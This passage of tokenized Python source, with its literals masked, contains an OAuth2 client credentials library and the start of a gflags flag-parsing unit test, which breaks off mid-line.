<EOL> } </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import clientsecrets <EOL> import copy <EOL> import datetime <EOL> import httplib2 <EOL> import logging <EOL> import sys <EOL> import urllib <EOL> import urlparse <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson <EOL> except ImportError : <EOL> import json as simplejson <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPIRY_FORMAT = "<STR_LIT>" <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FlowExchangeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AccessTokenRefreshError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownClientSecretsFlowError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AccessTokenCredentialsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _abstract ( ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class Credentials ( object ) : <EOL> """<STR_LIT>""" <EOL> NON_SERIALIZED_MEMBERS = [ '<STR_LIT:store>' ] <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _to_json ( self , strip ) : <EOL> """<STR_LIT>""" <EOL> t = type ( self ) <EOL> d = copy . copy ( self . __dict__ ) <EOL> for member in strip : <EOL> del d [ member ] <EOL> if '<STR_LIT>' in d and isinstance ( d [ '<STR_LIT>' ] , datetime . datetime ) : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . strftime ( EXPIRY_FORMAT ) <EOL> d [ '<STR_LIT>' ] = t . __name__ <EOL> d [ '<STR_LIT>' ] = t . __module__ <EOL> return simplejson . dumps ( d ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def new_from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> module = data [ '<STR_LIT>' ] <EOL> m = __import__ ( module , fromlist = module . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> kls = getattr ( m , data [ '<STR_LIT>' ] ) <EOL> from_json = getattr ( kls , '<STR_LIT>' ) <EOL> return from_json ( s ) <EOL> class Flow ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Storage ( object ) : <EOL> """<STR_LIT>""" <EOL> def acquire_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def release_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_get ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> self . locked_put ( credentials ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> class OAuth2Credentials ( Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , client_id , client_secret , refresh_token , <EOL> token_expiry , token_uri , user_agent ) : <EOL> """<STR_LIT>""" <EOL> self . access_token = access_token <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . refresh_token = refresh_token <EOL> self . store = None <EOL> self . token_expiry = token_expiry <EOL> self . token_uri = token_uri <EOL> self . user_agent = user_agent <EOL> self . invalid = False <EOL> def to_json ( self ) : <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> if '<STR_LIT>' in data and not isinstance ( data [ '<STR_LIT>' ] , <EOL> datetime . datetime ) : <EOL> try : <EOL> data [ '<STR_LIT>' ] = datetime . datetime . strptime ( <EOL> data [ '<STR_LIT>' ] , EXPIRY_FORMAT ) <EOL> except : <EOL> data [ '<STR_LIT>' ] = None <EOL> retval = OAuth2Credentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> return retval <EOL> @ property <EOL> def access_token_expired ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . invalid : <EOL> return True <EOL> if not self . token_expiry : <EOL> return False <EOL> now = datetime . datetime . utcnow ( ) <EOL> if now >= self . token_expiry : <EOL> logger . info ( '<STR_LIT>' , <EOL> now , self . token_expiry ) <EOL> return True <EOL> return False <EOL> def set_store ( self , store ) : <EOL> """<STR_LIT>""" <EOL> self . store = store <EOL> def _updateFromCredential ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( other . __getstate__ ( ) ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = copy . copy ( self . __dict__ ) <EOL> del d [ '<STR_LIT:store>' ] <EOL> return d <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . store = None <EOL> def _generate_refresh_request_body ( self ) : <EOL> """<STR_LIT>""" <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT>' : self . refresh_token , <EOL> } ) <EOL> return body <EOL> def _generate_refresh_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> return headers <EOL> def _refresh ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> if not self . store : <EOL> self . _do_refresh_request ( http_request ) <EOL> else : <EOL> self . store . acquire_lock ( ) <EOL> try : <EOL> new_cred = self . store . locked_get ( ) <EOL> if ( new_cred and not new_cred . invalid and <EOL> new_cred . access_token != self . access_token ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _updateFromCredential ( new_cred ) <EOL> else : <EOL> self . _do_refresh_request ( http_request ) <EOL> finally : <EOL> self . store . release_lock ( ) <EOL> def _do_refresh_request ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> body = self . _generate_refresh_request_body ( ) <EOL> headers = self . _generate_refresh_request_headers ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> resp , content = http_request ( <EOL> self . token_uri , method = '<STR_LIT:POST>' , body = body , headers = headers ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> self . access_token = d [ '<STR_LIT>' ] <EOL> self . refresh_token = d . get ( '<STR_LIT>' , self . refresh_token ) <EOL> if '<STR_LIT>' in d : <EOL> self . token_expiry = datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) + datetime . datetime . utcnow ( ) <EOL> else : <EOL> self . token_expiry = None <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> self . invalid = True <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> except : <EOL> pass <EOL> raise AccessTokenRefreshError ( error_msg ) <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> request_orig = http . request <EOL> def new_request ( uri , method = '<STR_LIT:GET>' , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , <EOL> connection_type = None ) : <EOL> if not self . access_token : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _refresh ( request_orig ) <EOL> if headers is None : <EOL> headers = { } <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> if self . user_agent is not None : <EOL> if '<STR_LIT>' in headers : <EOL> headers [ '<STR_LIT>' ] = self . user_agent + '<STR_LIT:U+0020>' + headers [ '<STR_LIT>' ] <EOL> else : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> resp , content = request_orig ( uri , method , body , headers , <EOL> redirections , connection_type ) <EOL> if resp . status == <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _refresh ( request_orig ) <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> return request_orig ( uri , method , body , headers , <EOL> redirections , connection_type ) <EOL> else : <EOL> return ( resp , content ) <EOL> http . request = new_request <EOL> return http <EOL> class AccessTokenCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , user_agent ) : <EOL> """<STR_LIT>""" <EOL> super ( AccessTokenCredentials , self ) . __init__ ( <EOL> access_token , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> user_agent ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _refresh ( self , http_request ) : <EOL> raise AccessTokenCredentialsError ( <EOL> "<STR_LIT>" ) <EOL> class AssertionCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , assertion_type , user_agent , <EOL> token_uri = '<STR_LIT>' , <EOL> ** unused_kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> token_uri , <EOL> user_agent ) <EOL> self . assertion_type = assertion_type <EOL> def _generate_refresh_request_body ( self ) : <EOL> assertion = self . _generate_assertion ( ) <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : self . assertion_type , <EOL> '<STR_LIT>' : assertion , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return body <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> class OAuth2WebServerFlow ( Flow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client_id , client_secret , scope , user_agent = None , <EOL> auth_uri = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> if type ( scope ) is list : <EOL> scope = '<STR_LIT:U+0020>' . join ( scope ) <EOL> self . scope = scope <EOL> self . user_agent = user_agent <EOL> self . auth_uri = auth_uri <EOL> self . token_uri = token_uri <EOL> self . params = kwargs <EOL> self . redirect_uri = None <EOL> def step1_get_authorize_url ( self , redirect_uri = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . redirect_uri = redirect_uri <EOL> query = { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } <EOL> query . update ( self . params ) <EOL> parts = list ( urlparse . urlparse ( self . auth_uri ) ) <EOL> query . update ( dict ( parse_qsl ( parts [ <NUM_LIT:4> ] ) ) ) <EOL> parts [ <NUM_LIT:4> ] = urllib . urlencode ( query ) <EOL> return urlparse . urlunparse ( parts ) <EOL> def step2_exchange ( self , code , http = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( code , str ) or isinstance ( code , unicode ) ) : <EOL> code = code [ '<STR_LIT:code>' ] <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:code>' : code , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( self . token_uri , method = '<STR_LIT:POST>' , body = body , <EOL> headers = headers ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> access_token = d [ '<STR_LIT>' ] <EOL> refresh_token = d . get ( '<STR_LIT>' , None ) <EOL> token_expiry = None <EOL> if '<STR_LIT>' in d : <EOL> token_expiry = datetime . datetime . utcnow ( ) + datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) <EOL> logger . info ( '<STR_LIT>' % content ) <EOL> return OAuth2Credentials ( access_token , self . client_id , <EOL> self . client_secret , refresh_token , token_expiry , <EOL> self . token_uri , self . user_agent ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> except : <EOL> pass <EOL> raise FlowExchangeError ( error_msg ) <EOL> def flow_from_clientsecrets ( filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename ) <EOL> if client_type in [ clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ] : <EOL> return OAuth2WebServerFlow ( <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> scope , <EOL> None , <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> if message : <EOL> sys . exit ( message ) <EOL> else : <EOL> raise <EOL> else : <EOL> raise UnknownClientSecretsFlowError ( <EOL> '<STR_LIT>' * client_type ) </s>
<s> "<STR_LIT>" <EOL> __pychecker__ = "<STR_LIT>" <EOL> import sys <EOL> import os <EOL> import shutil <EOL> import gflags <EOL> from flags_modules_for_testing import module_foo <EOL> from flags_modules_for_testing import module_bar <EOL> from flags_modules_for_testing import module_baz <EOL> FLAGS = gflags . FLAGS <EOL> import gflags_googletest as googletest <EOL> class FlagsUnitTest ( googletest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> FLAGS . UseGnuGetOpt ( False ) <EOL> def test_flags ( self ) : <EOL> number_test_framework_flags = len ( FLAGS . RegisteredFlags ( ) ) <EOL> repeatHelp = "<STR_LIT>" <EOL> gflags . DEFINE_integer ( "<STR_LIT>" , <NUM_LIT:4> , repeatHelp , <EOL> lower_bound = <NUM_LIT:0> , short_name = '<STR_LIT:r>' ) <EOL> gflags . DEFINE_string ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT:q>" , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT:x>" , <NUM_LIT:3> , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT:l>" , <NUM_LIT> L , "<STR_LIT>" ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , "<STR_LIT>" ) <EOL> gflags . DEFINE_enum ( "<STR_LIT>" , None , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT:?>" ) <EOL> number_defined_flags = <NUM_LIT:11> + <NUM_LIT:1> <EOL> self . assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags + number_test_framework_flags ) <EOL> assert FLAGS . repeat == <NUM_LIT:4> , "<STR_LIT>" + FLAGS . repeat <EOL> assert FLAGS . name == '<STR_LIT>' , "<STR_LIT>" + FLAGS . name <EOL> assert FLAGS . debug == <NUM_LIT:0> , "<STR_LIT>" + FLAGS . debug <EOL> assert FLAGS . q == <NUM_LIT:1> , "<STR_LIT>" + FLAGS . q <EOL> assert FLAGS . x == <NUM_LIT:3> , "<STR_LIT>" + FLAGS . x <EOL> assert FLAGS . l == <NUM_LIT> L , ( "<STR_LIT>" <EOL> + FLAGS . l ) <EOL> assert FLAGS . letters == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , ( "<STR_LIT>" <EOL> + FLAGS . letters ) <EOL> assert FLAGS . numbers == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , ( "<STR_LIT>" <EOL> + FLAGS . numbers ) <EOL> assert FLAGS . kwery is None , ( "<STR_LIT>" <EOL> + FLAGS . kwery ) <EOL> flag_values = FLAGS . FlagValuesDict ( ) <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:4> <EOL> assert flag_values [ '<STR_LIT:name>' ] == '<STR_LIT>' <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> assert flag_values [ '<STR_LIT:r>' ] == <NUM_LIT:4> <EOL> assert flag_values [ '<STR_LIT:q>' ] == <NUM_LIT:1> <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> assert flag_values [ '<STR_LIT:x>' ] == <NUM_LIT:3> <EOL> assert flag_values [ '<STR_LIT:l>' ] == <NUM_LIT> L <EOL> assert flag_values [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> assert flag_values [ '<STR_LIT>' ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert flag_values [ '<STR_LIT>' ] is None <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:name>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:q>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:x>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:l>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> keys = list ( FLAGS ) <EOL> keys . sort ( ) <EOL> reg_flags = FLAGS . RegisteredFlags ( ) <EOL> reg_flags . sort ( ) <EOL> self . assertEqual ( keys , reg_flags ) <EOL> argv = ( '<STR_LIT>' , ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:name>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:name>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:q>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:q>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:x>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:x>' ] . present = <NUM_LIT:0> <EOL> self . assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags + number_test_framework_flags ) <EOL> assert '<STR_LIT:name>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:r>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:q>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:x>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:l>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert FLAGS . has_key ( '<STR_LIT:name>' ) <EOL> assert not FLAGS . has_key ( '<STR_LIT>' ) <EOL> assert '<STR_LIT:name>' in FLAGS <EOL> assert '<STR_LIT>' not in FLAGS <EOL> del FLAGS . r <EOL> self . assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags - <NUM_LIT:1> + number_test_framework_flags ) <EOL> assert not '<STR_LIT:r>' in FLAGS . RegisteredFlags ( ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:name>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:name>' ] . present = <NUM_LIT:0> <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> assert FLAGS [ '<STR_LIT>' ] . value <EOL> FLAGS . Reset ( ) <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:0> <EOL> assert not FLAGS [ '<STR_LIT>' ] . value <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> assert FLAGS [ '<STR_LIT>' ] . value == '<STR_LIT>' <EOL> FLAGS . Reset ( ) <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT>' ] . value == None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , long ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> argv = FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . test0 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> FLAGS . test1 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . test0 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> FLAGS . test1 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . noexec = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . noexec == <NUM_LIT:0> <EOL> FLAGS . noexec = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . noexec == <NUM_LIT:1> <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . testnone == None <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == <NUM_LIT:1> <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == <NUM_LIT:0> <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == '<STR_LIT:foo>' <EOL> assert FLAGS . get ( '<STR_LIT>' , '<STR_LIT:foo>' ) == '<STR_LIT:foo>' <EOL> lists = [ [ '<STR_LIT:hello>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ] , <EOL> [ ] , ] <EOL> gflags . DEFINE_list ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gflags . DEFINE_spaceseplist ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for name , sep in ( ( '<STR_LIT>' , '<STR_LIT:U+002C>' ) , ( '<STR_LIT>' , '<STR_LIT:U+0020>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:\n>' ) ) : <EOL> for lst in lists : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' % ( name , sep . join ( lst ) ) ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( getattr ( FLAGS , name ) , lst ) <EOL> flagsHelp = str ( FLAGS ) <EOL> assert flagsHelp . find ( "<STR_LIT>" ) != - <NUM_LIT:1> , "<STR_LIT>" <EOL> assert flagsHelp . find ( repeatHelp ) != - <NUM_LIT:1> , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEqual ( FLAGS . get ( '<STR_LIT>' , None 